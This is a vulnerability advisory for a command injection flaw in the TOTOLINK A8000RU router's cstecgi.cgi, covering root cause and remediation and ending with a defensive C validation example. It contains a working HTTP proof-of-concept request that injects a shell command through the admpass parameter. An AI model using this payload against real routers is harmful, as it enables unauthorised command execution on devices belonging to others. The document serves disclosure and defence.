# Summary of Command Injection Vulnerability in A8000RU

## Vulnerability Overview

A command injection vulnerability was discovered in the `cstecgi.cgi` component of the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands on the router by crafting malicious requests.

**Root Cause:**

- The function `sub_41FBD0` reads the user-supplied parameter `admpass`.
- This value is inserted into the `v11` variable and formatted via `sprintf`.
- The command is ultimately executed by `execv` within the `CstSystem` function.

## Affected Scope

- **Vendor**: TOTOLINK
- **Product**: A8000RU
- **Version**: 7.1cu.643.b20200521

## Remediation

No specific fix is currently provided on the vendor's page. It is recommended to:

1. Upgrade to the latest secure version.
2. Strictly filter and validate user input.
3. Avoid directly using user input to execute system commands.

## Proof of Concept (PoC)

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 80
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=21772465702.2
Connection: keep-alive

{"topicurl":"setLoginPasswordCfg","admpass":" ls>./setLoginPasswordCfg.txt"}
```

**Verification Result**: After submitting the above HTTP request, the file `setLoginPasswordCfg.txt` was successfully created. Its contents precisely listed the filenames in the directory, confirming that the command `ls>./setLoginPasswordCfg.txt` was executed successfully.
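The root cause and remediation items above, illustrated as an added C example that is not TOTOLINK firmware code: the unsafe `sprintf`-into-command pattern next to a hardened path that allowlists the `admpass` value and hands it to the target program as its own `argv` element so no shell ever parses it. The command name `setpass`, the `ADMPASS_MAX` limit and the punctuation allowlist are assumptions chosen for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed maximum length for the password parameter (not from the advisory). */
#define ADMPASS_MAX 64

/* Allowlist validator for admpass. Accepts only ASCII alphanumerics and a
 * conservative set of punctuation, so shell metacharacters such as ' ', '>',
 * ';', '|', '`' and '$' are rejected before they reach any command string. */
int admpass_is_valid(const char *s) {
    if (s == NULL) return 0;
    size_t n = strlen(s);
    if (n == 0 || n > ADMPASS_MAX) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (isalnum(c)) continue;
        if (strchr("._-@!#%^+=", c) != NULL) continue; /* assumed allowlist */
        return 0; /* anything else, including whitespace and redirection, fails */
    }
    return 1;
}

/* The vulnerable pattern the advisory describes: user input is formatted
 * straight into a command line that a shell later interprets. Returns 1 if
 * the full string fit into out, 0 otherwise. */
int build_cmd_unsafe(char *out, size_t outsz, const char *admpass) {
    int w = snprintf(out, outsz, "setpass %s", admpass); /* "setpass" is a placeholder */
    return w > 0 && (size_t)w < outsz;
}

/* Hardened path: validate first, then build an argv suitable for execv/execve.
 * The value travels as a separate argument and is never shell-interpreted.
 * Returns argc on success or -1 when the input is rejected. */
int build_argv_safe(const char *admpass, const char *argv[], size_t maxargs) {
    if (maxargs < 3 || !admpass_is_valid(admpass)) return -1;
    argv[0] = "setpass";   /* placeholder program name */
    argv[1] = admpass;     /* passed verbatim as one argument */
    argv[2] = NULL;
    return 2;
}
```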